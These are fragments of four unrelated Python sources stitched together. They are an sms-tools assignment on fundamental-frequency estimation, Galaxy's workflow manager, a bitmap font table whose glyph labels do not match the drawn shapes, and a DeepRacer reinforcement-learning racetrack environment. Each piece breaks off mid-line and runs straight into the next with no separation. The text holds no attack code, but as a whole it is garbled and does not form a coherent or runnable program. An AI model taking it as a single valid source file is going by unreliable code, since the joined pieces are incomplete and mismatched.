sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../software/models/'))
import utilFunctions as UF
import harmonicModel as HM
import dftModel as DFT
import stft
eps = np.finfo(float).eps
"""
A6Part4 - Improving the implementation of the two way mismatch f0 estimation algorithm
Improve the performance of the current implementation of the two way mismatch algorithm in sms-tools
used for fundamental frequency estimation. This is an optional open question and will not contribute
towards the final grade. There is no definite answer for this question. Its main purpose is to
understand the limitations of the current implementations of the TWM algorithm and to come up with
some community driven solutions based on collective thinking.
In this question you will directly modify the core functions that implement the TWM algorithm in
sms-tools. To assist you with this task, we have copied all the needed functions into this python
file. Hence, you just need to modify the functions in this file and not anywhere else.
Estimating fundamental frequency from an audio signal is still a challenging and unsolved problem
to a large extent. By this time you might have also realized that many times the performance of the
TWM f0 estimation algorithm falls short of the expectations. There can be a systematic explanation
for the scenarios where TWM fails for specific categories or characteristics of the sounds. Some of
the known scenarios where the current implementation of the TWM algorithm fails to estimate a correct
fundamental frequency are:
1) Missing fundamental frequency: For many sounds the fundamental frequency component is very low and
therefore during the spectral peak picking step we do not obtain any peak corresponding to the f0.
Since the TWM algorithm implemented in sms-tools considers only the detected spectral peaks as the
f0 candidates, we do not get any candidate corresponding to the f0. This causes f0 estimation to fail.
For example, such a scenario is encountered in low pitched vocal sounds.
2) Pseudo-harmonicity in the sound. Many instruments such as piano exhibit some deviation from perfect
harmonicity wherein their harmonic partials are not perfectly located at integral multiples of the
fundamental frequency. Since the TWM algorithm computes error function assuming that the harmonic
locations are at integral multiples, its performance is poorer when such deviations exist.
In this question we propose to work on these two scenarios. Go to freesound and download sound examples
of low pitched vocal sounds and of piano. Run current implementation of TMW to identify the limitations
and propose improvements to the code in order to obtain better f0 estimation for those two particular
scenarios.
The core TWM algorithm is implemented in the function TWM_p(), which takes in an array of f0 candidates
and detect the candidate that has the lowest error. TWM_p() is called by f0Twm(), which generates
f0 candidates (f0c = np.argwhere((pfreq>minf0) & (pfreq<maxf0))[:,0]). This function also implements
a memory based prunning of the f0 candidates. If the f0 contour is found to be stable (no drastic
transitions across frames) then only the f0 candidates close to the stable f0 value are retained.
f0Twm() is called for every audio frame by f0Detection().
You can use computeAndPlotF0(), which calls f0Detection() for estimating f0 for every audio frame.
In addition, it also plots the f0 contour on the top of the spectrogram. If you set plot=1, it shows
the plot, plot=2 saves the plot as can be seen in the code.
Once you implement your proposed enhancement, discuss and share your ideas on the discussion forum
assigned for A6Part4 - https://class.coursera.org/audio-001/forum/list?forum_id=10026. Along with the
text you should include 2 plots showing the f0 contour before and after your changes. Use the same
values of the analysis parameters while showing the improvement in the performance. in the discussion,
also include a link to the sound in freesound.
TIP: An identified limitation of the current implementation for the case of low vocal sounds is that
it can only find f0 if there is a peak present in the magnitude spectrum. A possible improvement is
to generate additional f0 candidates from the identified peaks. Another identified limitation for
the case of piano sounds is the assumption of perfect harmonicity. For these sounds you can think
of modifying the generation of the ideal harmonic series that is computed in the code, incorporating
the typical deviation from harmonicity encountered in piano sounds.
NOTE: Before you start making changes in the TWM implementation make sure you have reached the best
possible performance that can be achieved by tuning the analysis parameters. If the analysis parameters
are inappropriately set, it is not completely meaningful to just improve the TWM implementation.
To maintain the integrity if the sms-tools package for future assignments, please make changes only
to the functions in this file and not the other files in sms-tools.
"""
def computeAndPlotF0(inputFile = '../../sounds/piano.wav'):
"""
Function to estimate fundamental frequency (f0) in an audio signal using TWM.
Input:
inputFile (string): wav file including the path
"""
window='hamming'
M=2048
N=2048
H=256
f0et=5.0
t=-80
minf0=100
maxf0=300
fs, x = UF.wavread(inputFile) #reading inputFile
w = get_window(window, M) #obtaining analysis window
f0 = f0Detection(x, fs, w, N, H, t, minf0, maxf0, f0et) #estimating F0
## Code for plotting the f0 contour on top of the spectrogram
# frequency range to plot
maxplotfreq = 500.0
fontSize = 16
plot = 1
fig = plt.figure()
ax = fig.add_subplot(111)
mX, pX = stft.stftAnal(x, w, N, H) #using same params as used for analysis
mX = np.transpose(mX[:,:int(N*(maxplotfreq/fs))+1])
timeStamps = np.arange(mX.shape[1])*H/float(fs)
binFreqs = np.arange(mX.shape[0])*fs/float(N)
plt.pcolormesh(timeStamps, binFreqs, mX)
plt.plot(timeStamps, f0, color = 'k', linewidth=1.5)
plt.autoscale(tight=True)
plt.ylabel('Frequency (Hz)', fontsize = fontSize)
plt.xlabel('Time (s)', fontsize = fontSize)
plt.legend(('f0',))
xLim = ax.get_xlim()
yLim = ax.get_ylim()
ax.set_aspect((xLim[1]-xLim[0])/(2.0*(yLim[1]-yLim[0])))
if plot == 1:
plt.autoscale(tight=True)
plt.show()
elif plot == 2: #you can save the plot too!
fig.tight_layout()
fig.savefig('f0_over_Spectrogram.png', dpi=150, bbox_inches='tight')
def f0Detection(x, fs, w, N, H, t, minf0, maxf0, f0et):
"""
Fundamental frequency detection of a sound using twm algorithm
x: input sound; fs: sampling rate; w: analysis window;
N: FFT size; t: threshold in negative dB,
minf0: minimum f0 frequency in Hz, maxf0: maximim f0 frequency in Hz,
f0et: error threshold in the f0 detection (ex: 5),
returns f0: fundamental frequency
"""
if (minf0 < 0): # raise exception if minf0 is smaller than 0
raise ValueError("Minumum fundamental frequency (minf0) smaller than 0")
if (maxf0 >= 10000): # raise exception if maxf0 is bigger than fs/2
raise ValueError("Maximum fundamental frequency (maxf0) bigger than 10000Hz")
if (H <= 0): # raise error if hop size 0 or negative
raise ValueError("Hop size (H) smaller or equal to 0")
hN = N/2 # size of positive spectrum
hM1 = int(math.floor((w.size+1)/2)) # half analysis window size by rounding
hM2 = int(math.floor(w.size/2)) # half analysis window size by floor
x = np.append(np.zeros(hM2),x) # add zeros at beginning to center first window at sample 0
x = np.append(x,np.zeros(hM1)) # add zeros at the end to analyze last sample
pin = hM1 # init sound pointer in middle of anal window
pend = x.size - hM1 # last sample to start a frame
fftbuffer = np.zeros(N) # initialize buffer for FFT
w = w / sum(w) # normalize analysis window
f0 = [] # initialize f0 output
f0t = 0 # initialize f0 track
f0stable = 0 # initialize f0 stable
while pin<pend:
x1 = x[pin-hM1:pin+hM2] # select frame
mX, pX = DFT.dftAnal(x1, w, N) # compute dft
ploc = UF.peakDetection(mX, t) # detect peak locations
iploc, ipmag, ipphase = UF.peakInterp(mX, pX, ploc) # refine peak values
ipfreq = fs * iploc/N # convert locations to Hez
f0t = f0Twm(ipfreq, ipmag, f0et, minf0, maxf0, f0stable) # find f0
if ((f0stable==0)&(f0t>0)) \
or ((f0stable>0)&(np.abs(f0stable-f0t)<f0stable/5.0)):
f0stable = f0t # consider a stable | |
<filename>lib/galaxy/managers/workflows.py<gh_stars>0
from __future__ import absolute_import
from collections import namedtuple
import json
from galaxy import model
from galaxy import exceptions
from galaxy.model.item_attrs import UsesAnnotations
from galaxy.workflow import modules
# For WorkflowContentManager
from galaxy.util.sanitize_html import sanitize_html
from galaxy.workflow.steps import attach_ordered_steps
from galaxy.workflow.modules import module_factory, is_tool_module_type, ToolModule
from galaxy.tools.parameters.basic import DataToolParameter, DataCollectionToolParameter
from galaxy.tools.parameters import visit_input_values
from galaxy.web import url_for
class WorkflowsManager( object ):
""" Handle CRUD type operaitons related to workflows. More interesting
stuff regarding workflow execution, step sorting, etc... can be found in
the galaxy.workflow module.
"""
def __init__( self, app ):
self.app = app
def check_security( self, trans, has_workflow, check_ownership=True, check_accessible=True):
""" check accessibility or ownership of workflows, storedworkflows, and
workflowinvocations. Throw an exception or returns True if user has
needed level of access.
"""
if not check_ownership or check_accessible:
return True
# If given an invocation follow to workflow...
if isinstance( has_workflow, model.WorkflowInvocation ):
has_workflow = has_workflow.workflow
# stored workflow contains security stuff - follow that workflow to
# that unless given a stored workflow.
if hasattr( has_workflow, "stored_workflow" ):
stored_workflow = has_workflow.stored_workflow
else:
stored_workflow = has_workflow
if stored_workflow.user != trans.user and not trans.user_is_admin():
if check_ownership:
raise exceptions.ItemOwnershipException()
# else check_accessible...
if trans.sa_session.query( model.StoredWorkflowUserShareAssociation ).filter_by(user=trans.user, stored_workflow=stored_workflow ).count() == 0:
raise exceptions.ItemAccessibilityException()
return True
def get_invocation( self, trans, decoded_invocation_id ):
try:
workflow_invocation = trans.sa_session.query(
self.app.model.WorkflowInvocation
).get( decoded_invocation_id )
except Exception:
raise exceptions.ObjectNotFound()
self.check_security( trans, workflow_invocation, check_ownership=True, check_accessible=False )
return workflow_invocation
def cancel_invocation( self, trans, decoded_invocation_id ):
workflow_invocation = self.get_invocation( trans, decoded_invocation_id )
cancelled = workflow_invocation.cancel()
if cancelled:
trans.sa_session.add( workflow_invocation )
trans.sa_session.flush()
else:
# TODO: More specific exception?
raise exceptions.MessageException( "Cannot cancel an inactive workflow invocation." )
return workflow_invocation
def get_invocation_step( self, trans, decoded_workflow_invocation_step_id ):
try:
workflow_invocation_step = trans.sa_session.query(
model.WorkflowInvocationStep
).get( decoded_workflow_invocation_step_id )
except Exception:
raise exceptions.ObjectNotFound()
self.check_security( trans, workflow_invocation_step.workflow_invocation, check_ownership=True, check_accessible=False )
return workflow_invocation_step
def update_invocation_step( self, trans, decoded_workflow_invocation_step_id, action ):
if action is None:
raise exceptions.RequestParameterMissingException( "Updating workflow invocation step requires an action parameter. " )
workflow_invocation_step = self.get_invocation_step( trans, decoded_workflow_invocation_step_id )
workflow_invocation = workflow_invocation_step.workflow_invocation
if not workflow_invocation.active:
raise exceptions.RequestParameterInvalidException( "Attempting to modify the state of an completed workflow invocation." )
step = workflow_invocation_step.workflow_step
module = modules.module_factory.from_workflow_step( trans, step )
performed_action = module.do_invocation_step_action( step, action )
workflow_invocation_step.action = performed_action
trans.sa_session.add( workflow_invocation_step )
trans.sa_session.flush()
return workflow_invocation_step
def build_invocations_query( self, trans, decoded_stored_workflow_id ):
try:
stored_workflow = trans.sa_session.query(
self.app.model.StoredWorkflow
).get( decoded_stored_workflow_id )
except Exception:
raise exceptions.ObjectNotFound()
self.check_security( trans, stored_workflow, check_ownership=True, check_accessible=False )
return trans.sa_session.query(
model.WorkflowInvocation
).filter_by(
workflow_id=stored_workflow.latest_workflow_id
)
CreatedWorkflow = namedtuple("CreatedWorkflow", ["stored_workflow", "missing_tools"])
class WorkflowContentsManager(UsesAnnotations):
def build_workflow_from_dict(
self,
trans,
data,
source=None,
add_to_menu=False,
publish=False
):
# Put parameters in workflow mode
trans.workflow_building_mode = True
# Create new workflow from incoming dict
workflow = model.Workflow()
# If there's a source, put it in the workflow name.
if source:
name = "%s (imported from %s)" % ( data['name'], source )
else:
name = data['name']
workflow.name = name
if 'uuid' in data:
workflow.uuid = data['uuid']
# Assume no errors until we find a step that has some
workflow.has_errors = False
# Create each step
steps = []
# The editor will provide ids for each step that we don't need to save,
# but do need to use to make connections
steps_by_external_id = {}
# Keep track of tools required by the workflow that are not available in
# the local Galaxy instance. Each tuple in the list of missing_tool_tups
# will be ( tool_id, tool_name, tool_version ).
missing_tool_tups = []
for step_dict in self.__walk_step_dicts( data ):
module, step = self.__module_from_dict( trans, step_dict, secure=False )
steps.append( step )
steps_by_external_id[ step_dict['id' ] ] = step
if module.type == 'tool' and module.tool is None:
# A required tool is not available in the local Galaxy instance.
missing_tool_tup = ( step_dict[ 'tool_id' ], step_dict[ 'name' ], step_dict[ 'tool_version' ] )
if missing_tool_tup not in missing_tool_tups:
missing_tool_tups.append( missing_tool_tup )
# Save the entire step_dict in the unused config field, be parsed later
# when we do have the tool
step.config = json.dumps(step_dict)
if step.tool_errors:
workflow.has_errors = True
# Second pass to deal with connections between steps
self.__connect_workflow_steps( steps, steps_by_external_id )
# Order the steps if possible
attach_ordered_steps( workflow, steps )
# Connect up
stored = model.StoredWorkflow()
stored.name = workflow.name
workflow.stored_workflow = stored
stored.latest_workflow = workflow
stored.user = trans.user
stored.published = publish
if data[ 'annotation' ]:
annotation = sanitize_html( data[ 'annotation' ], 'utf-8', 'text/html' )
self.add_item_annotation( trans.sa_session, stored.user, stored, annotation )
# Persist
trans.sa_session.add( stored )
trans.sa_session.flush()
if add_to_menu:
if trans.user.stored_workflow_menu_entries is None:
trans.user.stored_workflow_menu_entries = []
menuEntry = model.StoredWorkflowMenuEntry()
menuEntry.stored_workflow = stored
trans.user.stored_workflow_menu_entries.append( menuEntry )
trans.sa_session.flush()
return CreatedWorkflow(
stored_workflow=stored,
missing_tools=missing_tool_tups
)
def update_workflow_from_dict(self, trans, stored_workflow, workflow_data, from_editor=False):
# Put parameters in workflow mode
trans.workflow_building_mode = True
# Convert incoming workflow data from json if coming from editor
data = json.loads(workflow_data) if from_editor else workflow_data
# Create new workflow from incoming data
workflow = model.Workflow()
# Just keep the last name (user can rename later)
workflow.name = stored_workflow.name
# Assume no errors until we find a step that has some
workflow.has_errors = False
# Create each step
steps = []
# The editor will provide ids for each step that we don't need to save,
# but do need to use to make connections
steps_by_external_id = {}
errors = []
for key, step_dict in data['steps'].iteritems():
is_tool = is_tool_module_type( step_dict[ 'type' ] )
if is_tool and not trans.app.toolbox.has_tool( step_dict['tool_id'], exact=True ):
errors.append("Step %s requires tool '%s'." % (step_dict['id'], step_dict['tool_id']))
if errors:
raise MissingToolsException(workflow, errors)
# First pass to build step objects and populate basic values
for step_dict in self.__walk_step_dicts( data ):
module, step = self.__module_from_dict( trans, step_dict, secure=from_editor )
# Create the model class for the step
steps.append( step )
steps_by_external_id[ step_dict['id' ] ] = step
if 'workflow_outputs' in step_dict:
for output_name in step_dict['workflow_outputs']:
m = model.WorkflowOutput(workflow_step=step, output_name=output_name)
trans.sa_session.add(m)
if step.tool_errors:
# DBTODO Check for conditional inputs here.
workflow.has_errors = True
# Second pass to deal with connections between steps
self.__connect_workflow_steps( steps, steps_by_external_id )
# Order the steps if possible
attach_ordered_steps( workflow, steps )
# Connect up
workflow.stored_workflow = stored_workflow
stored_workflow.latest_workflow = workflow
# Persist
trans.sa_session.flush()
# Return something informative
errors = []
if workflow.has_errors:
errors.append( "Some steps in this workflow have validation errors" )
if workflow.has_cycles:
errors.append( "This workflow contains cycles" )
return workflow, errors
def workflow_to_dict( self, trans, stored, style="export" ):
""" Export the workflow contents to a dictionary ready for JSON-ification and to be
sent out via API for instance. There are three styles of export allowed 'export', 'instance', and
'editor'. The Galaxy team will do it best to preserve the backward compatibility of the
'export' stye - this is the export method meant to be portable across Galaxy instances and over
time. The 'editor' style is subject to rapid and unannounced changes. The 'instance' export
option describes the workflow in a context more tied to the current Galaxy instance and includes
fields like 'url' and 'url' and actual unencoded step ids instead of 'order_index'.
"""
if style == "editor":
return self._workflow_to_dict_editor( trans, stored )
elif style == "instance":
return self._workflow_to_dict_instance( trans, stored )
else:
return self._workflow_to_dict_export( trans, stored )
def _workflow_to_dict_editor(self, trans, stored):
"""
"""
workflow = stored.latest_workflow
# Pack workflow data into a dictionary and return
data = {}
data['name'] = workflow.name
data['steps'] = {}
data['upgrade_messages'] = {}
# For each step, rebuild the form and encode the state
for step in workflow.steps:
# Load from database representation
module = module_factory.from_workflow_step( trans, step )
if not module:
step_annotation = self.get_item_annotation_obj( trans.sa_session, trans.user, step )
annotation_str = ""
if step_annotation:
annotation_str = step_annotation.annotation
invalid_tool_form_html = """<div class="toolForm tool-node-error">
<div class="toolFormTitle form-row-error">Unrecognized Tool: %s</div>
<div class="toolFormBody"><div class="form-row">
The tool id '%s' for this tool is unrecognized.<br/><br/>
To save this workflow, you will need to delete this step or enable the tool.
</div></div></div>""" % (step.tool_id, step.tool_id)
step_dict = {
'id': step.order_index,
'type': 'invalid',
'tool_id': step.tool_id,
'name': 'Unrecognized Tool: %s' % step.tool_id,
'tool_state': None,
'tooltip': None,
'tool_errors': ["Unrecognized Tool Id: %s" % step.tool_id],
'data_inputs': [],
'data_outputs': [],
'form_html': invalid_tool_form_html,
| |
O O O O
0x19, 0x30, # OO O OO
0x07, 0xC0, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @8142 '¾' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x07, 0xC0, # OOOOO
0x19, 0x30, # OO O OO
0x29, 0x28, # O O O O O
0x41, 0x04, # O O O
0x61, 0x0C, # OO O OO
0x81, 0x02, # O O O
0x81, 0x02, # O O O
0xC1, 0x06, # OO O OO
0x87, 0x02, # O OOO O
0x88, 0x02, # O O O
0x60, 0x0C, # OO OO
0x40, 0x04, # O O
0x28, 0x28, # O O O O
0x19, 0x30, # OO O OO
0x07, 0xC0, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @8188 '¿' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x07, 0xC0, # OOOOO
0x19, 0x30, # OO O OO
0x29, 0x28, # O O O O O
0x41, 0x04, # O O O
0x61, 0x0C, # OO O OO
0x81, 0x02, # O O O
0x81, 0x02, # O O O
0xDF, 0x86, # OO OOOOOO OO
0x81, 0x02, # O O O
0x80, 0x02, # O O
0x60, 0x0C, # OO OO
0x40, 0x04, # O O
0x28, 0x28, # O O O O
0x19, 0x30, # OO O OO
0x07, 0xC0, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @8234 'À' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x07, 0xC0, # OOOOO
0x19, 0x30, # OO O OO
0x29, 0x28, # O O O O O
0x41, 0x04, # O O O
0x61, 0x0C, # OO O OO
0x89, 0x02, # O O O O
0x87, 0x02, # O OOO O
0xC1, 0x06, # OO O OO
0x81, 0x02, # O O O
0x80, 0x02, # O O
0x60, 0x0C, # OO OO
0x40, 0x04, # O O
0x28, 0x28, # O O O O
0x19, 0x30, # OO O OO
0x07, 0xC0, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @8280 'Á' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x07, 0xC0, # OOOOO
0x19, 0x30, # OO O OO
0x29, 0x28, # O O O O O
0x41, 0x04, # O O O
0x65, 0x0C, # OO O O OO
0x83, 0x02, # O OO O
0x83, 0x02, # O OO O
0xC1, 0x06, # OO O OO
0x81, 0x02, # O O O
0x80, 0x02, # O O
0x60, 0x0C, # OO OO
0x40, 0x04, # O O
0x28, 0x28, # O O O O
0x19, 0x30, # OO O OO
0x07, 0xC0, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @8326 'Â' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x07, 0xC0, # OOOOO
0x19, 0x30, # OO O OO
0x29, 0x28, # O O O O O
0x41, 0x04, # O O O
0x61, 0x0C, # OO O OO
0x81, 0x02, # O O O
0x81, 0x02, # O O O
0xC1, 0x06, # OO O OO
0x81, 0x02, # O O O
0x80, 0x02, # O O
0x60, 0x0C, # OO OO
0x40, 0x04, # O O
0x28, 0x28, # O O O O
0x19, 0x30, # OO O OO
0x07, 0xC0, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @8372 'Ã' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x42, # O O
0x00, 0x66, # OO OO
0x00, 0x5A, # O OO O
0x00, 0x42, # O O
0x00, 0x42, # O O
0x04, 0x42, # O O O
0x0C, 0x42, # OO O O
0x1C, 0x44, # OOO O O
0x37, 0xFC, # OO OOOOOOOOO
0x60, 0x18, # OO OO
0xC0, 0x30, # OO OO
0xC0, 0x60, # OO OO
0x60, 0xC0, # OO OO
0x37, 0x00, # OO OOO
0x1C, 0x00, # OOO
0x0C, 0x00, # OO
0x04, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
# @8418 'Ä' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x84, 0x00, # O O
0xCC, 0x00, # OO OO
0xB4, 0x00, # O OO O
0x84, 0x00, # O O
0x84, 0x00, # O O
0x84, 0x40, # O O O
0x84, 0x60, # O O OO
0x44, 0x70, # O O OOO
0x7F, 0xD8, # OOOOOOOOO OO
0x30, 0x0C, # OO OO
0x18, 0x06, # OO OO
0x0C, 0x06, # OO OO
0x06, 0x0C, # OO OO
0x01, 0xD8, # OOO OO
0x00, 0x70, # OOO
0x00, 0x60, # OO
0x00, 0x40, # O
0x00, 0x00, #
0x00, 0x00, #
# @8464 'Å' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x04, 0x00, # O
0x0C, 0x00, # OO
0x1C, 0x00, # OOO
0x37, 0x00, # OO OOO
0x60, 0xC0, # OO OO
0xC0, 0x60, # OO OO
0xC0, 0x30, # OO OO
0x60, 0x18, # OO OO
0x37, 0xFC, # OO OOOOOOOOO
0x1C, 0x44, # OOO O O
0x0C, 0x42, # OO O O
0x04, 0x42, # O O O
0x00, 0x42, # O O
0x00, 0x42, # O O
0x00, 0x5A, # O OO O
0x00, 0x66, # OO OO
0x00, 0x42, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @8510 'Æ' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x40, # O
0x00, 0x60, # OO
0x00, 0x70, # OOO
0x01, 0xD8, # OOO OO
0x06, 0x0C, # OO OO
0x0C, 0x06, # OO OO
0x18, 0x06, # OO OO
0x30, 0x0C, # OO OO
0x7F, 0xD8, # OOOOOOOOO OO
0x44, 0x70, # O O OOO
0x84, 0x60, # O O OO
0x84, 0x40, # O O O
0x84, 0x00, # O O
0x84, 0x00, # O O
0xB4, 0x00, # O OO O
0xCC, 0x00, # OO OO
0x84, 0x00, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @8556 'Ç' (17 pixels wide)
0x00, 0x00, 0x00, #
0x00, 0x00, 0x00, #
0x00, 0x00, 0x00, #
0x00, 0x00, 0x00, #
0x06, 0x00, 0x00, # OO
0x0F, 0x00, 0x00, # OOOO
0x19, 0x80, 0x00, # OO OO
0x30, 0xC0, 0x00, # OO OO
0x60, 0x60, 0x00, # OO OO
0xF0, | |
<filename>simulation/aws-robomaker-sample-application-deepracer/simulation_ws/src/sagemaker_rl_agent/markov/environments/deepracer_racetrack_env.py
from __future__ import print_function
import bisect
import boto3
import json
import logging
import math
import os
import time
import gym
import numpy as np
from gym import spaces
from PIL import Image
logger = logging.getLogger(__name__)
# Type of worker
SIMULATION_WORKER = "SIMULATION_WORKER"
SAGEMAKER_TRAINING_WORKER = "SAGEMAKER_TRAINING_WORKER"
node_type = os.environ.get("NODE_TYPE", SIMULATION_WORKER)
if node_type == SIMULATION_WORKER:
import rospy
from ackermann_msgs.msg import AckermannDriveStamped
from gazebo_msgs.msg import ModelState
from gazebo_msgs.srv import GetLinkState, GetModelState, SetModelState
from scipy.spatial.transform import Rotation
from sensor_msgs.msg import Image as sensor_image
from shapely.geometry import Point, Polygon
from shapely.geometry.polygon import LinearRing, LineString
# Type of job
TRAINING_JOB = 'TRAINING'
EVALUATION_JOB = 'EVALUATION'
# Sleep intervals
SLEEP_AFTER_RESET_TIME_IN_SECOND = 0.5
SLEEP_BETWEEN_ACTION_AND_REWARD_CALCULATION_TIME_IN_SECOND = 0.1
SLEEP_WAITING_FOR_IMAGE_TIME_IN_SECOND = 0.01
# Dimensions of the input training image
TRAINING_IMAGE_SIZE = (160, 120)
# Local offset of the front of the car
RELATIVE_POSITION_OF_FRONT_OF_CAR = [0.14, 0, 0]
# Normalized track distance to move with each reset
ROUND_ROBIN_ADVANCE_DIST = 0.05
# Reward to give the car when it "crashes"
CRASHED = 1e-8
### Gym Env ###
class DeepRacerRacetrackEnv(gym.Env):
def __init__(self):
# Create the observation space
img_width = TRAINING_IMAGE_SIZE[0]
img_height = TRAINING_IMAGE_SIZE[1]
self.observation_space = spaces.Box(low=0, high=255, shape=(img_height, img_width, 3), dtype=np.uint8)
# Create the action space
self.action_space = spaces.Box(low=np.array([-1, 0]), high=np.array([+1, +1]), dtype=np.float32)
if node_type == SIMULATION_WORKER:
# ROS initialization
rospy.init_node('rl_coach', anonymous=True)
rospy.Subscriber('/camera/zed/rgb/image_rect_color', sensor_image, self.callback_image)
self.ack_publisher = rospy.Publisher('/vesc/low_level/ackermann_cmd_mux/output',
AckermannDriveStamped, queue_size=100)
self.set_model_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState)
self.get_model_state = rospy.ServiceProxy('/gazebo/get_model_state', GetModelState)
self.get_link_state = rospy.ServiceProxy('/gazebo/get_link_state', GetLinkState)
# Read in parameters
self.world_name = rospy.get_param('WORLD_NAME')
self.job_type = rospy.get_param('JOB_TYPE')
self.aws_region = rospy.get_param('AWS_REGION')
self.metrics_s3_bucket = rospy.get_param('METRICS_S3_BUCKET')
self.metrics_s3_object_key = rospy.get_param('METRICS_S3_OBJECT_KEY')
self.metrics = []
self.simulation_job_arn = 'arn:aws:robomaker:' + self.aws_region + ':' + \
rospy.get_param('ROBOMAKER_SIMULATION_JOB_ACCOUNT_ID') + \
':simulation-job/' + rospy.get_param('AWS_ROBOMAKER_SIMULATION_JOB_ID')
if self.job_type == TRAINING_JOB:
from custom_files.customer_reward_function import reward_function
self.reward_function = reward_function
self.metric_name = rospy.get_param('METRIC_NAME')
self.metric_namespace = rospy.get_param('METRIC_NAMESPACE')
self.training_job_arn = rospy.get_param('TRAINING_JOB_ARN')
self.target_number_of_episodes = rospy.get_param('NUMBER_OF_EPISODES')
self.target_reward_score = rospy.get_param('TARGET_REWARD_SCORE')
else:
from markov.defaults import reward_function
self.reward_function = reward_function
self.number_of_trials = 0
self.target_number_of_trials = rospy.get_param('NUMBER_OF_TRIALS')
# Read in the waypoints
BUNDLE_CURRENT_PREFIX = os.environ.get("BUNDLE_CURRENT_PREFIX", None)
if not BUNDLE_CURRENT_PREFIX:
raise ValueError("Cannot get BUNDLE_CURRENT_PREFIX")
route_file_name = os.path.join(BUNDLE_CURRENT_PREFIX,
'install', 'deepracer_simulation', 'share',
'deepracer_simulation', 'routes', '{}.npy'.format(self.world_name))
waypoints = np.load(route_file_name)
self.is_loop = np.all(waypoints[0,:] == waypoints[-1,:])
if self.is_loop:
self.center_line = LinearRing(waypoints[:,0:2])
self.inner_border = LinearRing(waypoints[:,2:4])
self.outer_border = LinearRing(waypoints[:,4:6])
self.road_poly = Polygon(self.outer_border, [self.inner_border])
else:
self.center_line = LineString(waypoints[:,0:2])
self.inner_border = LineString(waypoints[:,2:4])
self.outer_border = LineString(waypoints[:,4:6])
self.road_poly = Polygon(np.vstack((self.outer_border, np.flipud(self.inner_border))))
self.center_dists = [self.center_line.project(Point(p), normalized=True) for p in self.center_line.coords[:-1]] + [1.0]
self.track_length = self.center_line.length
# Initialize state data
self.episodes = 0
self.start_dist = 0.0
self.round_robin = (self.job_type == TRAINING_JOB)
self.is_simulation_done = False
self.image = None
self.steering_angle = 0
self.speed = 0
self.action_taken = 0
self.prev_progress = 0
self.prev_point = Point(0, 0)
self.prev_point_2 = Point(0, 0)
self.next_state = None
self.reward = None
self.reward_in_episode = 0
self.done = False
self.steps = 0
self.simulation_start_time = 0
self.reverse_dir = False
def reset(self):
if node_type == SAGEMAKER_TRAINING_WORKER:
return self.observation_space.sample()
# Simulation is done - so RoboMaker will start to shut down the app.
# Till RoboMaker shuts down the app, do nothing more else metrics may show unexpected data.
if (node_type == SIMULATION_WORKER) and self.is_simulation_done:
while True:
time.sleep(1)
self.image = None
self.steering_angle = 0
self.speed = 0
self.action_taken = 0
self.prev_progress = 0
self.prev_point = Point(0, 0)
self.prev_point_2 = Point(0, 0)
self.next_state = None
self.reward = None
self.reward_in_episode = 0
self.done = False
# Reset the car and record the simulation start time
self.send_action(0, 0)
self.racecar_reset()
time.sleep(SLEEP_AFTER_RESET_TIME_IN_SECOND)
self.steps = 0
self.simulation_start_time = time.time()
# Compute the initial state
self.infer_reward_state(0, 0)
return self.next_state
def racecar_reset(self):
rospy.wait_for_service('/gazebo/set_model_state')
# Compute the starting position and heading
next_point_index = bisect.bisect(self.center_dists, self.start_dist)
start_point = self.center_line.interpolate(self.start_dist, normalized=True)
start_yaw = math.atan2(
self.center_line.coords[next_point_index][1] - start_point.y,
self.center_line.coords[next_point_index][0] - start_point.x)
start_quaternion = Rotation.from_euler('zyx', [start_yaw, 0, 0]).as_quat()
# Construct the model state and send to Gazebo
modelState = ModelState()
modelState.model_name = 'racecar'
modelState.pose.position.x = start_point.x
modelState.pose.position.y = start_point.y
modelState.pose.position.z = 0
modelState.pose.orientation.x = start_quaternion[0]
modelState.pose.orientation.y = start_quaternion[1]
modelState.pose.orientation.z = start_quaternion[2]
modelState.pose.orientation.w = start_quaternion[3]
modelState.twist.linear.x = 0
modelState.twist.linear.y = 0
modelState.twist.linear.z = 0
modelState.twist.angular.x = 0
modelState.twist.angular.y = 0
modelState.twist.angular.z = 0
self.set_model_state(modelState)
def step(self, action):
if node_type == SAGEMAKER_TRAINING_WORKER:
return self.observation_space.sample(), 0, False, {}
# Initialize next state, reward, done flag
self.next_state = None
self.reward = None
self.done = False
# Send this action to Gazebo and increment the step count
self.steering_angle = float(action[0])
self.speed = float(action[1])
self.send_action(self.steering_angle, self.speed)
time.sleep(SLEEP_BETWEEN_ACTION_AND_REWARD_CALCULATION_TIME_IN_SECOND)
self.steps += 1
# Compute the next state and reward
self.infer_reward_state(self.steering_angle, self.speed)
return self.next_state, self.reward, self.done, {}
def callback_image(self, data):
self.image = data
